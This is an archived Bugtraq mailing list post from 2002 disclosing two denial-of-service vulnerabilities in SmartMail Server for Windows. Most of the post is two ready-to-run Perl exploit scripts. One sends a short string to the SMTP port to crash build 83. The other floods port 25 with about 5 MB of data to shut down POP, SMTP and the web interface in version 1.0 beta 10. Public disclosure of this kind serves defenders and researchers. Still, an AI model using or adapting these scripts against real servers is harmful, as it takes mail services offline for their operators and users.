Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

SmartMail server DOS

From: securma massine <securma () caramail com>
Date: Thu, 31 Oct 2002 14:34:28 GMT+1
hi

SmartMail Server ( http://www.virtualzone.de/smartmail/)is
a full featured E-Mail Server. It can be
run on any 32Bit compatible Microsoft Windows machine and
complies with the standards of SMTP, POP3 and HTTP
(Webinterface).
SmartMail proposes two version of SmartMail server, I found
that two versions were vulnerable has an attack DOS
 1- SmartMail Server 2.0 Interim Build 83: the closing of
connection during sends dated causes one is
necessary "Access violatio at address 0046CBCC i
module 'smartsvr.exe' write of address 76756f4e " that is
exactly the same vulnerability which I have decouvert
concerning popwerft and the exploit has the same effect on
the two softwares
 expoit :


#!/usr/bin/perl -w
# greetz: marocit and #crack.fr (christal)
# securma () caramail com
use Socket;
if (not $ARGV[0]) {
        print qq~
                Usage: sm.pl <host>
        ~;
exit;}

$ip=$ARGV[0];
print "SmartMail server 2.0 DoS\n\n";
print "Sending Exploit Code to host: " . $ip . "\n\n";
sendexplt("MASSINE");
sub sendexplt {
 my ($pstr)=@_;
        $target= inet_aton($ip) || die("inet_aton
problems");
 socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')
||0) ||
 die("Socket problems\n");
 if(connect(S,pack "SnA4x8",2,25,$target)){
 select(S);
                $|=1;
 print $pstr;
 sleep 3;
         close(S);
 } else { die("Can't connect...\n"); }
}



2-SmartMail Server 1.0 BETA 10 :sends it 5MG of dated with
port 25 or 110 causes the shutdown of all the services
(pop/smtp/webinterface)
exploit:
#!/usr/bin/perl -w
# tool smartdos.pl
# securma () caramail com
# Greetz: marocit and #crack.fr (specialement christal.)
#
use IO::Socket;
if ($#ARGV<0)
{
 print "\n write the target IP!\n\n";
 exit;
}
$buffer = "A"x 5099999 ;
$connect = IO::Socket::INET ->new (Proto=>"tcp",
PeerAddr=> "$ARGV[0]",
PeerPort=>"25"); unless ($connect) { die "cant connect $ARGV
[0]" }
print $connect "$buffer";
print "\nsending exploit......\n\n";



securma () caramail com


_________________________________________________________
Gagne une PS2 ! Envoie un SMS avec le code PS au 61166
(0,35€ Hors coût du SMS)
Previous By Date Next
Previous By Thread Next

Current thread: